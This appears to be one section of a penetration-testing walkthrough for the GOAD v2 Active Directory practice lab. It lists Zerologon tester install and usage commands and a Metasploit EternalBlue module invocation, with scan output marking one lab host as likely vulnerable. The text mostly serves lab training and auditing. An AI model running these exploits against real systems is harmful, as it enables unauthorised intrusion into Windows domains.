⚔️2 - Quick Compromise

This section is a quick and fast way to get us a shell and user domain controller with a few simple (but very important) exploits enabled for outdated versions of windows, tomcat, mysql ...
There are some that are not exploitable in this v2 version of GOAD.
Zerologon
## Install
pip install -r requirements.txt
or
pipx install requirements.txt
## Use
./zerologon_tester.py EXAMPLE-DC 1.2.3.4
This exploit isnt functional for this version of GOAD (v2), but is relevant to have in consideration for anothers audits or CTFs, i dont know ...
Eternal Blue
msf> exploit/windows/smb/ms17_010_eternalblue # SMBv1 only
[-] 192.168.56.10:445 - The target is not vulnerable.
[-] 192.168.56.11:445 - The target is not vulnerable.
[+] 192.168.56.12:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[-] 192.168.56.22:445 - The target is not vulnerable.
[-] 192.168.56.23:445 - The target is not vulnerable.

Last updated